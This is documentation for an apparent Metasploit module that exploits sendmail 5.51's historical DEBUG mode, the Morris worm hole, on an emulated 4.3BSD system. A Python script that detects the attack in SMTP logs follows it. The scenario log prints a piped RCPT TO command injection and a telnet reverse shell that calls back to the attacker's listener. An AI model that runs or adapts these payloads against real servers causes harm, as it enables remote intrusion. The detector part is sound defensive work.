## Vulnerable Application

### Description

This module exploits `sendmail`'s well-known historical debug mode to escape to a shell and execute commands in the SMTP `RCPT TO` command.

This vulnerability was exploited by the Morris worm on 1988-11-02. Cliff Stoll reports on the worm in the epilogue of *The Cuckoo's Egg*.

### Setup

A Docker environment for 4.3BSD on VAX is available at .

For manual setup, please follow the Computer History Wiki's [guide](http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH) or Allen Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).

## Verification Steps

Follow [Setup](#setup) and [Scenarios](#scenarios).

## Targets

### 0

This targets `sendmail` version 5.51 from 1986-05-02.

## Options

### RPORT

Set this to the target port. The default is 25 for `sendmail`, but the port may be forwarded when NAT (SLiRP) is used in SIMH.

### PAYLOAD

Set this to a Unix command payload. Currently, only `cmd/unix/reverse` and `cmd/unix/generic` are supported.
## Scenarios

### `sendmail` 5.51 on 4.3BSD

```
msf5 > use exploit/unix/smtp/morris_sendmail_debug
msf5 exploit(unix/smtp/morris_sendmail_debug) > options

Module options (exploit/unix/smtp/morris_sendmail_debug):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT   25               yes       The target port (TCP)


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   @(#)version.c 5.51 (Berkeley) 5/2/86


msf5 exploit(unix/smtp/morris_sendmail_debug) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(unix/smtp/morris_sendmail_debug) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf5 exploit(unix/smtp/morris_sendmail_debug) > run

[*] Started reverse TCP double handler on 192.168.56.1:4444
[*] 127.0.0.1:25 - Connecting to sendmail
[*] 127.0.0.1:25 - Enabling debug mode and sending exploit
[*] 127.0.0.1:25 - Expecting: /220.*Sendmail/
[*] 127.0.0.1:25 - Sending: DEBUG
[*] 127.0.0.1:25 - Expecting: /200 Debug set/
[*] 127.0.0.1:25 - Sending: MAIL FROM:<3V900gQTSR70m6QPRYJnf3eoUIe6>
[*] 127.0.0.1:25 - Expecting: /250.*Sender ok/
[*] 127.0.0.1:25 - Sending: RCPT TO:<"| sed '1,/^$/d' | sh; exit 0">
[*] 127.0.0.1:25 - Expecting: /250.*Recipient ok/
[*] 127.0.0.1:25 - Sending: DATA
[*] 127.0.0.1:25 - Expecting: /354 Enter mail.*itself/
[*] 127.0.0.1:25 - Sending: PATH=/bin:/usr/bin:/usr/ucb:/etc
[*] 127.0.0.1:25 - Sending: export PATH
[*] 127.0.0.1:25 - Sending: sh -c '(sleep 3935|telnet 192.168.56.1 4444|while : ; do sh && break; done 2>&1|telnet 192.168.56.1 4444 >/dev/null 2>&1 &)'
[*] 127.0.0.1:25 - Sending: .
[*] 127.0.0.1:25 - Expecting: /250 Ok/
[*] 127.0.0.1:25 - Sending: QUIT
[*] 127.0.0.1:25 - Expecting: /221.*closing connection/
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo ISj759F8jEik4HAW;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "sh: Connected: not found\r\nsh: Escape: not found\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.1:58037) at 2020-02-06 15:51:28 -0600
[!] 127.0.0.1:25 - Do NOT type `exit', or else you may lose further shells!
[!] 127.0.0.1:25 - Hit ^C to abort the session instead, please and thank you

whoami
daemon
cat /etc/motd
4.3 BSD UNIX #1: Fri Jun 6 19:55:29 PDT 1986

Would you like to play a game?
```
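The exchange above has two observable tells on the wire: a client `DEBUG` command that the server answers with `200 Debug set`, and an `RCPT TO` whose address is a `|`-prefixed program rather than a mailbox. The following Python script is an added example, not part of this module or its documentation; it scans a captured SMTP session (assumed to be logged as `C:`/`S:` prefixed lines by a proxy or packet decoder, which is a constructed format) and reports those tells, rating a piped recipient that follows an accepted `DEBUG` higher than either signal alone. The sample sessions are constructed for illustration.

```python
"""Flag the sendmail DEBUG / piped-recipient pattern in a captured SMTP session.

Added example for this module's documentation, not part of the module itself.
Input format (assumed): one session as a list of strings, each prefixed with
"C:" (client to server) or "S:" (server to client).  Sample sessions below
are constructed.
"""
import re
from dataclasses import dataclass

# Client asks sendmail to enter debug mode.
DEBUG_CMD_RE = re.compile(r"^DEBUG\b", re.IGNORECASE)
# Server reply that confirms debug mode is on (the module waits for /200 Debug set/).
DEBUG_OK_RE = re.compile(r"^200\b.*Debug set", re.IGNORECASE)
# Recipient that starts with a pipe: sendmail treats it as a program to execute,
# optionally inside a quoted local part, e.g. RCPT TO:<"| program">.
PIPE_RCPT_RE = re.compile(r'^RCPT\s+TO:\s*<\s*"?\s*\|', re.IGNORECASE)


@dataclass
class Finding:
    line_no: int      # 1-based index into the session
    severity: str     # "medium", "high" or "critical"
    reason: str


def scan_session(lines):
    """Return a list of Finding objects for one SMTP session."""
    findings = []
    debug_sent = False
    debug_accepted = False
    for n, raw in enumerate(lines, 1):
        side, _, text = raw.partition(":")
        side, text = side.strip().upper(), text.strip()
        if side == "C":
            if DEBUG_CMD_RE.match(text):
                debug_sent = True
                findings.append(Finding(n, "medium", "client issued SMTP DEBUG command"))
            elif PIPE_RCPT_RE.match(text):
                # A program recipient after an accepted DEBUG is the full pattern.
                sev = "critical" if debug_accepted else "high"
                findings.append(Finding(n, sev, "RCPT TO address is a pipe to a program"))
        elif side == "S":
            if debug_sent and DEBUG_OK_RE.match(text):
                debug_accepted = True
                findings.append(Finding(n, "high", "server accepted DEBUG; debug mode enabled"))
    return findings


def top_severity(findings):
    """Highest severity present, or None for a clean session."""
    order = {"medium": 1, "high": 2, "critical": 3}
    return max((f.severity for f in findings), key=order.get, default=None)


# Constructed session mirroring the shape of the exchange in the Scenarios
# section (DATA body omitted; it is not needed for detection).
ATTACK_SESSION = [
    "S: 220 host.example.invalid Sendmail 5.51 ready",
    "C: DEBUG",
    "S: 200 Debug set",
    "C: MAIL FROM:<someone@example.invalid>",
    "S: 250 Sender ok",
    'C: RCPT TO:<"| some-program">',
    "S: 250 Recipient ok",
    "C: DATA",
    'S: 354 Enter mail, end with "." on a line by itself',
    "C: .",
    "S: 250 Ok",
    "C: QUIT",
]

# Constructed ordinary delivery for comparison.
BENIGN_SESSION = [
    "S: 220 host.example.invalid Sendmail 5.51 ready",
    "C: HELO client.example.invalid",
    "S: 250 Hello",
    "C: MAIL FROM:<someone@example.invalid>",
    "S: 250 Sender ok",
    "C: RCPT TO:<user@example.invalid>",
    "S: 250 Recipient ok",
    "C: DATA",
    'S: 354 Enter mail, end with "." on a line by itself',
    "C: .",
    "S: 250 Ok",
    "C: QUIT",
]

if __name__ == "__main__":
    for name, session in (("attack", ATTACK_SESSION), ("benign", BENIGN_SESSION)):
        found = scan_session(session)
        print(f"{name}: top severity = {top_severity(found)}")
        for f in found:
            print(f"  line {f.line_no:2d} [{f.severity}] {f.reason}")
```

The session-local state matters: a lone `DEBUG` on a modern MTA is just an unknown command, and a `|` recipient can come from a misconfigured client, but the two together in one session are the signature this module reproduces.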